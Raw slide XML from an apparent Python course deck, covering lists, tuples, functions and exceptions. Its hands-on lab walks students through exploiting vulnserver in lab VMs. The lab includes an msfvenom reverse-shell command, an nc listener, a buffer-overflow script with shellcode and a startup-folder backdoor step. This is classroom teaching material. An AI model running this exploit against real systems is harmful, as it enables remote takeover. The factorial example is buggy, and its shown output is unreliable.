              <a:rPr lang="en-US" altLang="en-US" sz="2000" b="0" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent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[2, 5, 6, 8]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en-US" sz="2000" b="0" dirty="0" smtClean="0">
              <a:solidFill>
                <a:schemeClr val="accent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dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="660033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20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b="0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li.sort</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="20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2000" b="0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some_function</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="20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)  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2000" b="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# sort in place using user-defined comparison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065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Summary: Tuples vs. Lists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b="0" dirty="0" smtClean="0">
                <a:ea typeface="ＭＳ Ｐゴシック" panose="020B0600070205080204" pitchFamily="34" charset="-128"/>
              </a:rPr>
              <a:t>Lists slower but more powerful than tuples</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2800" dirty="0" smtClean="0">
                <a:ea typeface="ＭＳ Ｐゴシック" panose="020B0600070205080204" pitchFamily="34" charset="-128"/>
              </a:rPr>
              <a:t>Lists can be modified, and they have lots of handy operations and </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2800" dirty="0" err="1" smtClean="0">
                <a:ea typeface="ＭＳ Ｐゴシック" panose="020B0600070205080204" pitchFamily="34" charset="-128"/>
              </a:rPr>
              <a:t>mehtods</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="en-US" sz="2800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800" dirty="0" smtClean="0">
                <a:ea typeface="ＭＳ Ｐゴシック" panose="020B0600070205080204" pitchFamily="34" charset="-128"/>
              </a:rPr>
              <a:t>Tuples are immutable and have fewer features</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2800" b="0" dirty="0" smtClean="0">
                <a:ea typeface="ＭＳ Ｐゴシック" panose="020B0600070205080204" pitchFamily="34" charset="-128"/>
              </a:rPr>
              <a:t>To convert between tuples and lists use the list() and tuple() functions:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="28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li = list(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2800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tu</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="28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)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2800" dirty="0" err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tu</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="28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tuple(li)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19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Motivating game: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Planting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backdoor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History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Running Python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Basics &amp; Names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&amp;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Assignment &amp; Loop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Sequences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types: Lists, Tuples, and Strings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Mutability</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Function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Exceptions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Hands-on lab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  <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="7" name="Picture 6" descr="Free vector graphic: Cartoon, Snake, Yellow - Free Image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0" y="4411663"/>
            <a:ext cx="15049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Function Definition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73964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r>
              <a:rPr lang="en-US" altLang="en-US" dirty="0"/>
              <a:t>"""factorial done recursively and iteratively"""</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" altLang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" dirty="0" err="1"/>
              <a:t>def</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" dirty="0"/>
              <a:t> fact1(n):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ans</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" dirty="0"/>
              <a:t> = 1</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" dirty="0"/>
              <a:t>    for i in range(2,n):</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" dirty="0"/>
              <a:t>        </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" dirty="0" err="1"/>
              <a:t>ans</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" dirty="0"/>
              <a:t> = </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" dirty="0" err="1"/>
              <a:t>ans</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" dirty="0"/>
              <a:t> * n</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" dirty="0"/>
              <a:t>    return </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" dirty="0" err="1"/>
              <a:t>ans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err="1"/>
              <a:t>def</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" dirty="0"/>
              <a:t> fact2(n):</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" dirty="0"/>
              <a:t>    if n &lt; 1:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" dirty="0"/>
              <a:t>        return 1</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" dirty="0"/>
              <a:t>    else:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" dirty="0"/>
              <a:t>        return n * fact2(n - 1)</a:t>
            </a:r>
          </a:p>
          <a:p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45440" y="1202040"/>
              <a:ext cx="7134480" cy="35067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840" y="1198440"/>
                <a:ext cx="7140600" cy="351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361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anose="020B0600070205080204" pitchFamily="34" charset="-128"/>
              </a:rPr>
              <a:t>Simple functions: ex.py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562600"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/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en-US" sz="2200" b="0" dirty="0" smtClean="0">
                <a:latin typeface="Courier" pitchFamily="-65" charset="0"/>
                <a:ea typeface="Helvetica" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>671&gt; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2200" b="0" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF3300"/>
                </a:solidFill>
                <a:latin typeface="Courier" pitchFamily="-65" charset="0"/>
                <a:ea typeface="Helvetica" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>python3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en-US" sz="2200" b="0" dirty="0" smtClean="0">
                <a:latin typeface="Courier" pitchFamily="-65" charset="0"/>
                <a:ea typeface="Helvetica" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>&gt;&gt;&gt; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2200" b="0" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF3300"/>
                </a:solidFill>
                <a:latin typeface="Courier" pitchFamily="-65" charset="0"/>
                <a:ea typeface="Helvetica" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>import ex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en-US" sz="2200" b="0" dirty="0" smtClean="0">
                <a:latin typeface="Courier" pitchFamily="-65" charset="0"/>
                <a:ea typeface="Helvetica" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>&gt;&gt;&gt; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2200" b="0" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF3300"/>
                </a:solidFill>
                <a:latin typeface="Courier" pitchFamily="-65" charset="0"/>
                <a:ea typeface="Helvetica" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>ex.fact1(6)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en-US" sz="2200" b="0" dirty="0" smtClean="0">
                <a:latin typeface="Courier" pitchFamily="-65" charset="0"/>
                <a:ea typeface="Helvetica" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>1296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en-US" sz="2200" b="0" dirty="0" smtClean="0">
                <a:latin typeface="Courier" pitchFamily="-65" charset="0"/>
                <a:ea typeface="Helvetica" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>&gt;&gt;&gt; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2200" b="0" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF3300"/>
                </a:solidFill>
                <a:latin typeface="Courier" pitchFamily="-65" charset="0"/>
                <a:ea typeface="Helvetica" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>ex.fact2(200)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en-US" sz="2200" b="0" dirty="0" smtClean="0">
                <a:latin typeface="Courier" pitchFamily="-65" charset="0"/>
                <a:ea typeface="Helvetica" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>78865786736479050355236321393218507…000000L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en-US" sz="2200" b="0" dirty="0" smtClean="0">
                <a:latin typeface="Courier" pitchFamily="-65" charset="0"/>
                <a:ea typeface="Helvetica" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>&gt;&gt;&gt; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2200" b="0" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF3300"/>
                </a:solidFill>
                <a:latin typeface="Courier" pitchFamily="-65" charset="0"/>
                <a:ea typeface="Helvetica" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>ex.fact1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en-US" sz="2200" b="0" dirty="0" smtClean="0">
                <a:latin typeface="Courier" pitchFamily="-65" charset="0"/>
                <a:ea typeface="Helvetica" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>&lt;function fact1 at 0x902470&gt;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en-US" sz="2200" b="0" dirty="0" smtClean="0">
                <a:latin typeface="Courier" pitchFamily="-65" charset="0"/>
                <a:ea typeface="Helvetica" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>&gt;&gt;&gt; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2200" b="0" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF3300"/>
                </a:solidFill>
                <a:latin typeface="Courier" pitchFamily="-65" charset="0"/>
                <a:ea typeface="Helvetica" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>fact1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en-US" sz="2200" b="0" dirty="0" err="1" smtClean="0">
                <a:latin typeface="Courier" pitchFamily="-65" charset="0"/>
                <a:ea typeface="Helvetica" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Traceback</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2200" b="0" dirty="0" smtClean="0">
                <a:latin typeface="Courier" pitchFamily="-65" charset="0"/>
                <a:ea typeface="Helvetica" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> (most recent call last):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en-US" sz="2200" b="0" dirty="0" smtClean="0">
                <a:latin typeface="Courier" pitchFamily="-65" charset="0"/>
                <a:ea typeface="Helvetica" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>  File "&lt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2200" b="0" dirty="0" err="1" smtClean="0">
                <a:latin typeface="Courier" pitchFamily="-65" charset="0"/>
                <a:ea typeface="Helvetica" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>stdin</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2200" b="0" dirty="0" smtClean="0">
                <a:latin typeface="Courier" pitchFamily="-65" charset="0"/>
                <a:ea typeface="Helvetica" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>&gt;", line 1, in &lt;module&gt;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en-US" sz="2200" b="0" dirty="0" err="1" smtClean="0">
                <a:latin typeface="Courier" pitchFamily="-65" charset="0"/>
                <a:ea typeface="Helvetica" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>NameError</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2200" b="0" dirty="0" smtClean="0">
                <a:latin typeface="Courier" pitchFamily="-65" charset="0"/>
                <a:ea typeface="Helvetica" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>: name 'fact1' is not defined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r>
              <a:rPr lang="en-US" altLang="en-US" sz="2200" b="0" dirty="0" smtClean="0">
                <a:latin typeface="Courier" pitchFamily="-65" charset="0"/>
                <a:ea typeface="Helvetica" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>&gt;&gt;&gt; </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPts val="2475"/>
              </a:lnSpc>
              <a:buFont typeface="Symbol" panose="05050102010706020507" pitchFamily="18" charset="2"/>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" altLang="en-US" b="0" dirty="0" smtClean="0">
              <a:latin typeface="Helvetica" panose="020B0604020202020204" pitchFamily="34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60520" y="1568160"/>
              <a:ext cx="2846880" cy="32241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640" y="1565640"/>
                <a:ext cx="2852280" cy="323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77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functions defined?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functions must be defined before any are used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However, the functions can be defined in any order, as long as all are defined before any executable code uses a function.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36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Motivating game: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Planting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backdoor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History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Running Python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Basics &amp; Names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&amp;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Assignment &amp; Loop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Sequences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types: Lists, Tuples, and Strings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Mutability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Function</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Exceptions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Hands-on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lab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  <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="7" name="Picture 6" descr="Chinese Zodiac Snake Vector Clipart image - Free stock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528563"/>
            <a:ext cx="1739860" cy="171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5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08721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Errors detected during execution are called </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>exceptions</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="120000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Handling </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Exceptions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while True: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     try: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         x = </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>int</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>(input("Please enter a number: "))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         break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     except </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>ValueError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         print("Oops!  That was no valid number.  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Try again...")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Handle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92216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First, the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0"/>
              <a:t>try clause </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>(the statement(s) between the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0"/>
              <a:t>try</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> and </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0"/>
              <a:t>except</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> keywords) is executed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If no exception occurs, the except clause is skipped and execution of the try statement is finished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If an exception occurs during execution of the try clause, the rest of the clause is skipped. </a:t>
            </a:r>
            <a:endParaRPr lang="en-US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Then </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>if its type matches the exception named after the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0"/>
              <a:t>except</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> keyword, the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0"/>
              <a:t>except</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> clause is executed, and then execution continues after the try statement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If an exception occurs which does not match the exception named in the except clause, it is passed on to outer try statements; </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="857250" lvl="1" indent="-457200">
              <a:lnSpc>
                <a:spcPct val="120000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>if </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>no handler is found, it is an unhandled exception and execution stops with a message as shown above.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81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Motivating game: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Planting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backdoor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History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Running Python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Basics &amp; Names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&amp;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Assignment &amp; Loop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Sequences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types: Lists, Tuples, and Strings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Mutability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Function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Exceptions</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Hands-on </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>lab</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/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59</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="6" name="Picture 5" descr="Free illustration: Letters, Abc, Education, Python - Fre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480" y="4349906"/>
            <a:ext cx="2453640" cy="173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1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Planting </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Backdoor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3"/>
            <a:ext cx="8229600" cy="476044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 TA clicks and starts the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>vulnserver</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> within file explorer on the two group Windows 10 VMs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C:\Tools\vulnserver\vulnserver.exe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Students take turns to </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>attack </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>vulnserver</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> from Kali Linux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Change reverse-shell.py: </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="1371600" lvl="2" indent="-514350">
              <a:lnSpc>
                <a:spcPct val="120000"/>
              </a:lnSpc>
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="alphaLcPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Change </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>victim IP </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>in </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>reverse-shell.py</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="1371600" lvl="2" indent="-514350">
              <a:lnSpc>
                <a:spcPct val="120000"/>
              </a:lnSpc>
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="alphaLcPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Change malware code: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>msfvenom</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t> -p windows/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>shell_reverse_tcp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t> LHOST=10.0.2.8 LPORT=4444 EXITFUNC=thread -f python -v SHELL -b '\x00\x0a\x0a'</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" i="1" dirty="0" smtClean="0">
              <a:solidFill>
                <a:srgbClr val="FF0000"/>
              </a:solidFill>
            </a:endParaRP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Run the following command in  to get into Windows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lphaLcPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>nc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-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>lp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4444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lphaLcPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>python3 reverse-shell.py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Windows deletes vulnserver.exe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15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 Backdoor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this in breakout rooms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61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What does if __name__ == “__main__”: do?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4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"/>
            <a:ext cx="6675120" cy="6446520"/>
          </a:xfrm>
          <a:solidFill>
            <a:schemeClr val="bg1"/>
          </a:solidFill>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="4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# To receive the reverse shell, run the following command at another terminal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#   </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>nc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> -l -v -p 4444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# This module "socket" provides access to the BSD socket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 socket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# This module "</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>struct</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>" performs conversions between Python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# and C </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>structs</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> represented as Python bytes objects.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 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>struct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HOST = '10.0.2.7'   # </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>vitcim</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t> IP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PORT = 9999         # victim port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# Shellcode created by </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>msfvenom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# </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>msfvenom</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> -p windows/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>shell_reverse_tcp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LHOST=10.0.2.8 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>LPORT=4444 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>EXITFUNC=thread -f python -v SHELL -b '\x00\x0a\x0a'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SHELL =  b""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SHELL += b"\</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>xba</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>\xb7\x9a\xd6\x72\xd9\</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>xea</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>\xd9\x74\x24\xf4\x5e"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# Payload to inject into </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>vulnserver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PAYLOAD = (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dirty="0" err="1"/>
              <a:t>b'KNOCK</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> /.:/' +  # TRUN command of the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dirty="0" err="1"/>
              <a:t>b'A</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>' * 2002 +   # padding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# b return a bytes object.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</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t># </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>&lt; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>means </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>little-endian; L </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>means unsigned long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dirty="0" err="1"/>
              <a:t>struct.pack</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>('&lt;L', 0x6250151C) +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dirty="0" err="1"/>
              <a:t>b'C</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>' * 32 +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SHELL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 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>socket.create_connection</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>((HOST, PORT)) as </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>fd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dirty="0" err="1"/>
              <a:t>fd.sendall</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>(PAYLOAD)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320" y="2042160"/>
            <a:ext cx="1783080" cy="271272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Attack Code to Get into Windows</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2800" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Cloud Callout 4"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4991100" y="1447800"/>
            <a:ext cx="1783080" cy="8686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 computer</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Cloud Callout 5"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2849880" y="716280"/>
            <a:ext cx="1783080" cy="8686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victim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0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Planting </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Backdoor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484783"/>
            <a:ext cx="8229600" cy="4992217"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="92500"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="971550" lvl="1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US" dirty="0"/>
              <a:t>Plant backdoor to Windows startup folder</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2">
              <a:lnSpc>
                <a:spcPct val="120000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>copy C:\</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0" smtClean="0">
